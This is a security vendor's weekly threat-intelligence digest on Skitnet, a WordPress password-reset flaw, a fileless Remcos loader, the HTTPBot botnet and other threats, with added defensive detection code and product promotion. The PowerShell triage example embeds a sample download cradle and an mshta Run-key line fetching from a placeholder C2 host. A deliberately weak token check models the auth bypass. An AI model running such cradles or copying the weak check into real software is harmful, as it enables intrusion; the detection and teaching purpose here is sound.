Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here.
NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
Ransomware Gangs Increasingly Use Skitnet Post-exploitation Malware
(TLP: CLEAR) A new malware strain called Skitnet (also known as “Bossnet”) has seen a rise in usage among ransomware gangs in 2025, particularly during post-exploitation phases. First sold on underground forums like RAMP in April 2024, Skitnet has since been used in operations by groups such as BlackBasta and Cactus, including in Microsoft Teams phishing attacks. Skitnet consists of a Rust-based loader that decrypts and loads a Nim binary payload in memory. It communicates with its command-and-control (C2) server through DNS-based reverse shells, allowing it to operate stealthily. Commands are issued via HTTP or DNS through a custom admin panel and include functionalities such as establishing persistence, capturing screenshots, installing remote access tools like AnyDesk and RUT-Serv, launching a PowerShell shell loop, and enumerating antivirus software. The malware also supports a .NET loader for running PowerShell scripts in memory, enabling further flexibility and evasion. Due to its robust features, stealth, and ease of deployment, Skitnet is becoming a favored tool, especially for ransomware groups that lack the resources to develop custom malware. Its off-the-shelf nature also complicates attribution. Prodaft has released Indicators of Compromise (IoCs) for Skitnet on its GitHub for defensive efforts.
(TLP: CLEAR) Comments: Skitnet, also known as “Bossnet,” has been adopted since early 2025 by established ransomware operations, notably BlackBasta, a ransomware-as-a-service (RaaS) group active since 2022 that targets enterprise networks with double extortion, and Cactus, a newer but highly active group known for stealthy, targeted intrusions. Both have used Skitnet in post-exploitation, including in Microsoft Teams phishing campaigns. Its appeal lies in stealth and modularity. Infection begins with a Rust-based loader that decrypts and executes a Nim binary, which sets up a DNS-based reverse shell for covert command-and-control (C2) communication. Supported capabilities include persistence via DLL hijacking, screen capture, deployment of remote access tools (AnyDesk, RUT-Serv), antivirus enumeration, and in-memory PowerShell execution through a .NET loader. Together these let operators maintain long-term access and conduct detailed reconnaissance with a minimal on-disk footprint. Because it is sold on underground forums such as RAMP, Skitnet lowers development overhead for affiliates and, since many unrelated groups can buy the same tool, complicates attribution; it suits both advanced and lower-tier actors. Because the C2 channel runs over DNS, resolver logs and Protective DNS are a natural detection point alongside the indicators of compromise (IoCs) that Prodaft researchers have published, and organizations should load those IoCs into DNS and endpoint tooling as adoption of the malware spreads.
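The DNS reverse shell described above is also the most observable part of the chain: every command and response has to pass through a resolver. The following is an added example (not Prodaft's, Vercara's or Skitnet's code) of the kind of heuristic screen a defender can run over resolver query logs to surface that pattern. The log lines are constructed, the domain under .test is a placeholder, and the thresholds and the two-label "registered domain" split are assumptions (production code should use the Public Suffix List and a tuned baseline).

```python
"""Heuristic screen for DNS-based C2 and tunnelling in resolver query logs.

Added illustration, not Prodaft's, Vercara's or Skitnet's code. The log
lines are constructed (reserved names under .test and example.com); the
thresholds are assumptions to tune against a real baseline, and the
two-label registered-domain split is a simplification.
"""
import math
import statistics
from collections import defaultdict

# Constructed resolver log: "<timestamp> <client> <qtype> <qname>"
SAMPLE_LOG = """\
2025-05-19T10:00:01 10.1.2.3 A www.example.com
2025-05-19T10:00:02 10.1.2.3 A cdn.example.com
2025-05-19T10:00:03 10.1.2.3 AAAA mail.example.com
2025-05-19T10:00:04 10.1.2.9 TXT 6a7b3c9e1f0d4a5b.c2-assumed-domain.test
2025-05-19T10:00:05 10.1.2.9 TXT 9f1e2d3c4b5a6978.c2-assumed-domain.test
2025-05-19T10:00:06 10.1.2.9 TXT 0badc0ffee123456.c2-assumed-domain.test
2025-05-19T10:00:07 10.1.2.9 TXT deadbeef01234567.c2-assumed-domain.test
2025-05-19T10:00:08 10.1.2.9 TXT 4e5f6a7b8c9d0e1f.c2-assumed-domain.test
2025-05-19T10:00:09 10.1.2.3 A www.example.com
"""

# Assumed thresholds: tune per environment.
ENTROPY_MIN = 3.0        # bits/char of the subdomain part
LABEL_LEN_MIN = 12       # mean subdomain length in characters
UNIQUE_SUBS_MIN = 5      # distinct subdomains under one registered domain
TXT_FRACTION_MIN = 0.5   # share of TXT/NULL queries
INDICATORS_TO_FLAG = 2   # how many indicators must fire


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain_part, registered_domain) using a naive 2-label split."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 3:
        return "", ".".join(labels)
    return "".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text: str):
    """Yield (client, qtype, qname) tuples from the constructed log format."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield parts[1], parts[2].upper(), parts[3]


def detect(text: str) -> dict:
    """Map flagged registered domains to the list of indicators that fired."""
    per_domain = defaultdict(lambda: {"subs": [], "qtypes": []})
    for _client, qtype, qname in parse_log(text):
        sub, dom = split_name(qname)
        per_domain[dom]["subs"].append(sub)
        per_domain[dom]["qtypes"].append(qtype)

    findings = {}
    for dom, d in per_domain.items():
        subs, qtypes = d["subs"], d["qtypes"]
        mean_entropy = statistics.mean(shannon_entropy(s) for s in subs)
        mean_len = statistics.mean(len(s) for s in subs)
        unique = len(set(subs))
        txt_frac = sum(q in ("TXT", "NULL") for q in qtypes) / len(qtypes)

        indicators = []
        if mean_entropy >= ENTROPY_MIN:
            indicators.append(f"high-entropy subdomains ({mean_entropy:.2f} bits/char)")
        if mean_len >= LABEL_LEN_MIN:
            indicators.append(f"long subdomains (mean {mean_len:.1f} chars)")
        if unique >= UNIQUE_SUBS_MIN:
            indicators.append(f"{unique} distinct subdomains")
        if txt_frac >= TXT_FRACTION_MIN:
            indicators.append(f"TXT/NULL-heavy ({txt_frac:.0%})")
        if len(indicators) >= INDICATORS_TO_FLAG:
            findings[dom] = indicators
    return findings


if __name__ == "__main__":
    for dom, why in detect(SAMPLE_LOG).items():
        print(dom, "->", "; ".join(why))
```

On the constructed log, the placeholder C2 domain trips all four indicators while example.com trips none. Requiring two or more indicators before flagging keeps single-trait false positives (CDNs with long but low-entropy hostnames, DKIM/SPF lookups that are TXT-heavy) out of the alert queue.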
(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION
Control:
- Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.
- Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.
- Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
- Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.”
NIST SI-3 requires malicious code detection and prevention mechanisms. These can be host-based, as with antivirus or EDR agents, and can be augmented by Protective DNS provided by the network the device sits on or as a service across the Internet. The combination provides defense in depth and extends coverage to devices such as Internet of Things (IoT) equipment and some servers that cannot run an endpoint agent.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections.
Source: https://www.bleepingcomputer.com/news/security/ransomware-gangs-increasingly-use-skitnet-post-exploitation-malware/
WordPress Plugin Vulnerability Exposes 22,000 Sites to Cyber Attacks
(TLP: CLEAR) A critical vulnerability, tracked as CVE-2025-4322, has been discovered in the widely used Motors WordPress theme, putting approximately 22,000 websites at serious risk. The flaw, rated with a CVSS score of 9.8, enables unauthenticated attackers to reset passwords for any user on a vulnerable site, including administrative accounts. This privilege escalation vulnerability arises from improper validation in the password recovery functionality, specifically within the password-recovery.php template file. Attackers can exploit this flaw by manipulating the hash_check parameter, using invalid UTF-8 characters to bypass the security check and gain unauthorized access. Once administrative control is obtained, malicious actors can upload backdoored plugins, modify site content, inject malware or spam, and access sensitive user data. This vulnerability, responsibly disclosed by security researcher Friderika Baranyai (“Foxyyy”) via the Wordfence Bug Bounty Program, exemplifies the broader trend of increasing WordPress security threats, with a reported 68% rise in disclosed vulnerabilities from 2023 to 2024. Site administrators are urged to upgrade to version 5.6.68 or later, released by StylemixThemes on May 14, 2025. Interim protection is available through Wordfence’s firewall, with premium users receiving early defense. This incident highlights the necessity of timely updates and layered security measures to mitigate exploitation risks, especially within the dynamic WordPress ecosystem where themes and plugins often present soft targets for malicious actors.
(TLP: CLEAR) Comments: CVE-2025-4322 in the Motors WordPress theme poses a significant threat to approximately 22,000 websites. Rated 9.8 on the CVSS scale, it allows unauthenticated attackers to reset the password of any user, including administrators. The flaw stems from inadequate validation within the password recovery mechanism in the theme’s password-recovery.php template: the hash_check parameter is not properly checked, and because the esc_attr() function strips invalid UTF-8 characters, a crafted value can bypass the intended comparison and escalate privileges. The vulnerability is attractive to attackers because it is easy to execute and grants high-value access. With administrative control, an attacker can upload malicious plugins or backdoors, inject spam content or malware, steal sensitive data, or redirect visitors to malicious domains; the low barrier to entry and the theme’s wide deployment make it a natural target for automated, large-scale campaigns. The case underscores the importance of regular theme and plugin updates and of layered defenses such as web application firewalls and continuous monitoring. Administrators should update to version 5.6.68 or later, apply temporary mitigations where immediate patching is not possible, and review user accounts and recent password changes for signs that the flaw was exploited before the patch, since unpatched instances remain attractive targets for actors seeking to expand access or establish persistence.
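A generic model of the flaw class described above, as an added example rather than the Motors theme's actual code. The helper escape_attr() stands in for WordPress's esc_attr() and models only the behaviour the disclosure describes (input that is not valid UTF-8 collapses to an empty string); that a user with no pending reset has an empty stored token is an assumption made here to show why escaping an attacker-controlled value before comparing it is dangerous. The hardened version rejects malformed input instead of sanitising it, fails closed on empty or expired tokens, compares in constant time and burns the token on use.

```python
"""Password-reset token verification: the weak pattern beside a hardened one.

Added example, not the Motors theme's code. `escape_attr` is a stand-in for
WordPress's esc_attr() modelling only the behaviour the disclosure describes
(invalid UTF-8 collapses to ""). That a user with no pending reset has an
empty stored token is an assumption made to show why the pattern fails.
"""
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime for a reset link

# Constructed user store: no reset is pending for admin.
USERS = {"admin": {"reset_token": "", "issued_at": 0.0}}


def escape_attr(raw: bytes) -> str:
    """Stand-in for esc_attr(): invalid UTF-8 becomes "" (modelled behaviour)."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return ""


def issue_token(user: str) -> str:
    """Create a reset token for `user`; this value goes into the emailed link."""
    token = secrets.token_urlsafe(32)
    USERS.setdefault(user, {})
    USERS[user].update(reset_token=token, issued_at=time.time())
    return token


def vulnerable_check(user: str, hash_check: bytes) -> bool:
    """Weak: the attacker-controlled value is escaped before the comparison,
    so invalid UTF-8 becomes "" and matches any user whose stored token is ""."""
    stored = USERS.get(user, {}).get("reset_token", "")
    return stored == escape_attr(hash_check)


def hardened_check(user: str, hash_check: bytes) -> bool:
    """Reject instead of sanitising; fail closed on empty or expired tokens."""
    record = USERS.get(user)
    if not record or not record.get("reset_token"):
        return False                      # nothing was issued: nothing can match
    if time.time() - record["issued_at"] > TOKEN_TTL_SECONDS:
        return False                      # stale link
    try:
        supplied = hash_check.decode("utf-8")
    except UnicodeDecodeError:
        return False                      # malformed input is an error, not ""
    if not supplied or not supplied.isascii():
        return False                      # tokens are ASCII; anything else is noise
    return hmac.compare_digest(supplied, record["reset_token"])


def reset_password(user: str, hash_check: bytes) -> bool:
    """Single-use: a successful check invalidates the token before any change."""
    if not hardened_check(user, hash_check):
        return False
    USERS[user]["reset_token"] = ""       # burn the token
    return True                           # caller now sets the new password hash
```

The vulnerable path accepts two bytes of invalid UTF-8 for the admin account because both sides of the comparison are the empty string; the hardened path treats an empty stored token and undecodable input as hard failures and never lets a sanitiser rewrite the value it is about to compare.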
(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. “While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy. “WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.”
(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. Its always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats.
Source: https://cybersecuritynews.com/wordpress-plugin-vulnerability-2/
Hackers Actively Exploiting PowerShell to Evade Antivirus & EDR
(TLP: CLEAR) Cybersecurity experts have observed an alarming rise in fileless malware attacks, with threat actors increasingly using advanced techniques to evade traditional security measures. A recent example involves a sophisticated PowerShell-based shellcode loader that deploys the Remcos Remote Access Trojan (RAT) entirely in memory, avoiding detection by signature-based antivirus tools. The attack typically starts with malicious ZIP archives containing weaponized LNK files disguised as benign documents which, when executed, initiate a stealthy infection chain that abuses trusted Windows system binaries. The chain establishes persistence through registry modifications and bypasses User Account Control (UAC) to gain elevated privileges, while leaving minimal forensic traces on disk. The infection flow involves downloading an HTA file from command-and-control servers, which then triggers PowerShell to run the final payload directly in memory. Qualys researchers emphasize the malware’s obfuscation techniques, such as encrypted scripts and dynamic API calls, that complicate automated detection and analysis. Remcos RAT provides attackers with extensive capabilities, including screen capture, keylogging, credential theft, and data exfiltration, enabling prolonged, stealthy access to compromised systems. Security experts recommend enhancing PowerShell logging (script block logging in particular), leveraging the Antimalware Scan Interface (AMSI), and deploying behavior-based Endpoint Detection and Response (EDR) solutions to detect such fileless threats early. This trend highlights the need for security teams to move beyond signature-based defenses and adopt behavior-focused detection strategies.
(TLP: CLEAR) Comments: Malicious actors could leverage the fileless PowerShell-based loader delivering Remcos RAT to maintain covert, persistent access within compromised systems. By executing code entirely in memory and abusing trusted Windows processes such as MSHTA and PowerShell, attackers evade signature-based security tools and gain long-term stealth. The initial infection via weaponized LNK files disguised as legitimate documents raises the likelihood that a user will open them. Once inside, attackers bypass User Account Control to gain elevated privileges, allowing them to manipulate system settings, disable defenses, and deploy further payloads. Persistence is ensured by modifying registry Run keys, so the malware survives reboots undetected. This approach facilitates credential theft, keylogging, and data exfiltration, giving attackers extensive control. Such fileless techniques are favored by advanced threat actors seeking stealth and persistence; they complicate detection and remediation for security teams and increase the overall risk to targeted organizations, which is why the detection opportunity lies in the process and script telemetry (PowerShell logging, AMSI, EDR behavior rules) rather than in files on disk.
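One way to act on the logging recommendation above: a triage pass over PowerShell Script Block Logging events (Event ID 4104) that decodes any -EncodedCommand argument and scores each layer for the indicators the article names (download cradle, in-memory execution via IEX, dynamic API use, hidden-window launch, Run-key persistence). This is an added example, not Qualys's analysis code; the events are constructed, c2.invalid is a reserved non-resolving name, and the weights and alert threshold are assumptions to tune against a baseline of the estate's legitimate scripts.

```python
"""Triage of PowerShell Script Block Logging events (Event ID 4104).

Added example, not Qualys's code. The events are constructed; the indicator
weights and alert threshold are assumptions to tune against a baseline.
"""
import base64
import re

# (pattern over lower-cased text, weight, tag); weights are assumptions
INDICATORS = [
    (r"-(?:enc|encodedcommand|e)\b", 2, "encoded command"),
    (r"frombase64string", 2, "base64 decode"),
    (r"\biex\b|invoke-expression", 3, "invoke-expression"),
    (r"downloadstring|net\.webclient|invoke-webrequest|\biwr\b", 3, "download cradle"),
    (r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile", 1, "hidden/no-profile launch"),
    (r"\bmshta\b|\.hta\b", 2, "mshta/HTA"),
    (r"dllimport|add-type|virtualalloc|marshal\]::", 3, "dynamic API / shellcode"),
    (r"currentversion\\run", 2, "Run-key persistence"),
    (r"amsiutils|amsiinitfailed", 4, "AMSI tamper"),
]
ALERT_THRESHOLD = 4

ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> list:
    """Return the UTF-16LE plaintext of every -EncodedCommand argument found."""
    decoded = []
    for m in ENCODED_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue   # not a real encoded command; keep scanning
    return decoded


def score_script(text: str):
    """Score the script block and every decoded layer beneath it."""
    score, tags = 0, set()
    for layer in [text] + decode_encoded_commands(text):
        low = layer.lower()
        for pattern, weight, tag in INDICATORS:
            if re.search(pattern, low):
                score += weight
                tags.add(tag)
    return score, sorted(tags)


def triage(events, threshold=ALERT_THRESHOLD):
    """Return [(index, score, tags)] for 4104 events at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") != 4104:
            continue
        score, tags = score_script(ev.get("ScriptBlockText", ""))
        if score >= threshold:
            hits.append((i, score, tags))
    return hits


# Constructed sample events; the cradle is base64-encoded exactly as
# powershell.exe -EncodedCommand expects (UTF-16LE, then base64).
CRADLE_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage.hta')"
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem C:\\Users | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(CRADLE_SAMPLE.encode("utf-16-le")).decode("ascii")},
    {"EventID": 4104, "ScriptBlockText":
     "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
     "-Name Updater -Value 'mshta http://c2.invalid/p.hta'"},
]

if __name__ == "__main__":
    for idx, score, tags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score} -> {', '.join(tags)}")
```

The decode step is what makes this useful against the loader described: the outer command line only shows a hidden-window launch and an encoded argument, while the IEX download cradle and the .hta reference are visible only after the UTF-16LE base64 layer is unpacked. Script block logging also records the de-obfuscated blocks PowerShell actually executes, so the same scoring can be applied to those events as they arrive.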
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website categories feeds.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses a multi-petabyte data lake filled with DNS query history and indicators of compromise from multiple Cyber Threat Intelligence (CTI) data feeds to correlate an incoming DNS query in real-time with previously observed malicious activity. This ensures that users and devices only go to safe, policy-compliant Internet locations.
Source: https://cybersecuritynews.com/hackers-actively-exploiting-powershell/
New HTTPBot Botnet Launches 200+ Precision DDoS Attacks on Gaming and Tech Sectors
(TLP: CLEAR) A new botnet malware called HTTPBot has emerged that primarily targets the gaming industry, technology companies, and educational institutions in China. First detected in August 2024, HTTPBot is distinctive for targeting Windows systems and launching highly targeted Distributed Denial-of-Service (DDoS) attacks over HTTP. Unlike traditional DDoS attacks that rely on overwhelming traffic volume, HTTPBot employs precise, high-fidelity techniques to disrupt critical business functions such as game login and payment systems. It achieves stealth by hiding its graphical user interface and manipulating the Windows Registry to persist across reboots. It connects to command-and-control servers to receive instructions for its attack modules, which include simulating legitimate browser traffic and abusing HTTP/2 and WebSocket to exhaust server resources. Its obfuscation and session simulation techniques let it bypass conventional defenses that depend on protocol integrity or raw request volume. The botnet represents a shift in DDoS tactics toward “high-precision business strangulation” that targets real-time, business-critical services on Windows platforms, posing a significant risk to the targeted industries in China.
(TLP: CLEAR) Comments: The emergence of HTTPBot represents a significant evolution in botnet capabilities, combining sophisticated attack techniques with precise targeting of high-value services. While currently documented to focus on industries in China—namely gaming, technology, education, and tourism sectors—there is substantial potential for this botnet to expand geographically and affect other regions worldwide. Its modular architecture, which supports diverse HTTP-based attack methods such as BrowserAttack, HttpAutoAttack, and WebSocketAttack, offers considerable flexibility to adapt to different target environments and evade detection. HTTPBot’s capability to simulate legitimate browser traffic and exploit multiple protocols (including HTTP/2 and WebSocket) indicates a highly advanced design aimed at bypassing conventional security defenses reliant on traffic volume or protocol integrity checks. By targeting Windows platforms, which remain widely used in corporate and enterprise environments globally, HTTPBot could disrupt critical online services beyond China, particularly in industries dependent on real-time interactions, such as online gaming, e-commerce, and financial services. The botnet’s use of registry persistence, GUI concealment, and command-and-control communication enhances its stealth and resilience, making it a potent tool for threat actors seeking to conduct sustained, precise DDoS campaigns. As such, organizations worldwide should proactively monitor for behaviors indicative of HTTPBot activity and reinforce defenses against application-layer and session-based DDoS attacks to mitigate this emerging threat.
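Added example (not code from the HTTPBot analysis) of the application-layer screen a defender can run over web access logs for the behaviour described above: many requests from one source concentrated on login and payment paths, delivered with the machine-regular timing that browser-driven users do not produce. The log lines are generated from documentation IP ranges; the window, rate and jitter thresholds are assumptions to tune against real traffic.

```python
"""Application-layer flood screen for HTTPBot-style precision attacks.

Added example, not from the HTTPBot analysis. The access-log lines are
generated here (documentation IP ranges); thresholds are assumptions.
"""
import statistics
from collections import defaultdict

SENSITIVE_PREFIXES = ("/login", "/api/pay")
WINDOW_SECONDS = 10.0
RATE_LIMIT = 20          # sensitive requests per window per source
MIN_GAPS = 5             # gaps needed before timing regularity is judged
JITTER_MAX = 0.02        # std-dev of inter-arrival times, in seconds


def parse_access_log(text: str):
    """Yield (epoch, src_ip, path) from '<epoch> <ip> <method> <path> <status>' lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5:
            yield float(parts[0]), parts[1], parts[3]


def peak_in_window(ts, window):
    """Largest number of timestamps that fall within any `window`-second span."""
    ts = sorted(ts)
    peak, j = 0, 0
    for i in range(len(ts)):
        while ts[i] - ts[j] > window:
            j += 1
        peak = max(peak, i - j + 1)
    return peak


def analyze(text: str) -> dict:
    """Map suspicious source IPs to the reasons they were flagged."""
    by_src = defaultdict(list)
    for ts, ip, path in parse_access_log(text):
        if path.startswith(SENSITIVE_PREFIXES):
            by_src[ip].append(ts)
    findings = {}
    for ip, ts in by_src.items():
        reasons = []
        peak = peak_in_window(ts, WINDOW_SECONDS)
        if peak > RATE_LIMIT:
            reasons.append(f"{peak} sensitive requests in {WINDOW_SECONDS:.0f}s")
        ts = sorted(ts)
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(gaps) >= MIN_GAPS and statistics.pstdev(gaps) < JITTER_MAX:
            reasons.append(f"machine-regular timing (std-dev {statistics.pstdev(gaps):.3f}s)")
        if reasons:
            findings[ip] = reasons
    return findings


def build_sample_log() -> str:
    """Constructed traffic: one bot hitting /login at a fixed 0.25 s cadence,
    one human browsing with irregular gaps."""
    lines = []
    t0 = 1_747_650_000.0
    for i in range(40):                                   # bot: 203.0.113.7
        lines.append(f"{t0 + 0.25 * i:.3f} 203.0.113.7 POST /login 401")
    for i, gap in enumerate([0.0, 3.1, 7.8, 9.4, 15.2, 21.0]):   # human: 198.51.100.4
        path = "/login" if i < 2 else "/account"
        lines.append(f"{t0 + gap:.3f} 198.51.100.4 GET {path} 200")
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, why in analyze(build_sample_log()).items():
        print(ip, "->", "; ".join(why))
```

Rate alone is a weak signal against a botnet that paces itself below a per-IP limit; the inter-arrival jitter test catches the fixed-cadence replay that scripted session simulation tends to produce, and the two checks are reported separately so an analyst can see which one fired.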
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity and Infrastructure Security Agency (CISA), FBI, and Multi-State ISAC publication “Understanding and Responding to Distributed Denial-of-Service Attacks”: “Develop an organization DDoS response plan. The response plan should guide your organization through identifying, mitigating, and rapidly recovering from DDoS attacks. All internal stakeholders—including your organization’s leaders and network defenders—and service providers should understand their roles and responsibilities through all stages of a DDoS attack. At a minimum, the plan should include understanding the nature of a DDoS attack, confirming a DDoS attack, deploying mitigations, monitoring and recovery.”
(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect is a purpose-built DDoS mitigation solution that offers comprehensive protection through on-premises hardware, cloud-based DDoS mitigation, or hybrid approaches. Tailored to meet any organizational need, Vercara’s array of DDoS Protection services include blocking DDoS attacks, redirecting DDoS attacks, and cloud DDoS prevention, ensuring the broadest and most adaptable DDoS defense services available.
Source: https://thehackernews.com/2025/05/new-httpbot-botnet-launches-200.html
Shields Up US Retailers. Scattered Spider Threat Actors Can Target Them
(TLP: CLEAR) The financially motivated cybercrime group UNC3944, also known as Scattered Spider or 0ktapus, has been active in social engineering and extortion, targeting hundreds of organizations over the past two years, including major companies like Twilio, LastPass, DoorDash, and Mailchimp. Originally focusing on telecom companies for SIM swap fraud, the group expanded its operations by 2023 to include ransomware attacks and broader industry sectors. Despite a decline in activity following arrests in 2024, UNC3944 is believed to maintain connections with other threat actors, potentially enabling a resurgence. Recently, the group shifted attention from UK retailers—where ransomware attacks involving DragonForce ransomware were observed—to U.S. companies. Retailers are attractive targets due to their large repositories of personally identifiable information (PII) and financial data, as well as their vulnerability to ransom demands that disrupt financial transaction processing. UNC3944’s tactics include exploiting help desks and outsourced IT services through social engineering to achieve high-impact breaches. Their primary targets span sectors such as technology, telecom, finance, business process outsourcing, gaming, retail, and media, focusing largely on large enterprises in English-speaking countries, India, and Singapore. This evolving strategy underscores the group’s adaptability and ongoing threat to diverse industries worldwide.
(TLP: CLEAR) Comments: UNC3944, also known as Scattered Spider or 0ktapus, is a financially motivated cybercrime group specializing in social engineering and extortion. Initially focused on telecom companies via SIM swap attacks, the group has expanded to ransomware and broader sectors, targeting high-value industries such as technology, finance, retail, and media. Their tactics rely heavily on exploiting human vulnerabilities, particularly through help desks and outsourced IT support, enabling high-impact breaches. The group is linked to DragonForce ransomware and possibly the RansomHub RaaS platform, indicating their use of ransomware-as-a-service models for scalable attacks. UNC3944 targets large enterprises primarily in English-speaking countries, India, and Singapore, reflecting a strategic focus on organizations with valuable data, including personally identifiable information (PII) and financial records. Their recent shift from UK retailers to U.S. companies demonstrates geographic flexibility and opportunism. UNC3944’s evolving tactics emphasize the importance of robust security awareness, especially around social engineering and insider threat mitigation, to defend against this persistent and adaptable threat actor.
(TLP: CLEAR) Recommended best practices/regulations: PCI DSS v4.0 Requirement 5.2.1: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Combining agent-based and network-based detection, such as a Protective DNS solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and servers, and also covers non-standard assets such as IoT devices and servers that cannot run anti-malware software.
(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports 4 distinct detection engines to provide Defense in Depth against malware and phishing and other abuses:
- The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars.
- The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one button click.
- The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature.
- The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR.
Major Russian State Services Disrupted, Reportedly Due to Cyberattack
(TLP: CLEAR) Several major Russian state services experienced disruptions due to a reported large-scale distributed denial-of-service (DDoS) attack originating from abroad. Affected services include Russia’s tax service (FNS), secure digital key management (Goskey), and document management platform (Saby), with ongoing efforts to restore access. Additionally, Russian businesses reported outages in government services regulating alcohol distribution and product counterfeiting controls. These incidents follow a recent wave of outages affecting Russian banking apps, social media platforms like VKontakte, messaging services, and telecommunications networks. While no group has claimed responsibility for the latest attacks, similar disruptions have previously been linked to Ukraine-affiliated hacktivists such as the IT Army and pro-Ukraine group 4B1D, which reportedly targeted a private hospital’s patient record systems. Notably, these cyberattacks often coincide with significant political events. The recent disruptions occurred shortly after a phone call between U.S. President Trump and Russian President Putin discussing a potential ceasefire in Ukraine, though the connection remains unconfirmed.
(TLP: CLEAR) Comments: The recent large-scale DDoS attacks on critical Russian state services underscore the increasing cyber dimension of the ongoing Russia-Ukraine conflict. These disruptions target key government infrastructure such as tax services, secure digital key management, and document control systems, signaling a strategic intent to degrade Russia’s administrative capabilities and create operational friction. The attacks appear consistent with previous cyber offensives attributed to Ukraine-linked hacktivist groups, including the IT Army and 4B1D, which have repeatedly targeted Russian networks and critical services since the onset of hostilities. Such cyber operations reflect a broader pattern of asymmetric warfare, where non-traditional tactics like cyberattacks serve to exert pressure on state institutions without direct military engagement. The timing of the attacks—shortly after diplomatic communications between Russian and U.S. leadership regarding a potential ceasefire—could indicate an effort to influence political negotiations or destabilize Russia’s internal systems during a sensitive period. Regionally, this cyber conflict exacerbates existing tensions and highlights the growing reliance on digital disruption as a tool in hybrid warfare, complicating Russia’s ability to maintain normal state functions and signaling an escalation in cyber hostilities within the ongoing geopolitical struggle.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.IR-04: “Adequate resource capacity to ensure availability is maintained.” Businesses, particularly those in NATO member states and allied countries, should maintain constant vigilance and regularly test and improve their defensive capabilities, specifically DDoS mitigation strategies, architecture, monitoring, and procedures.
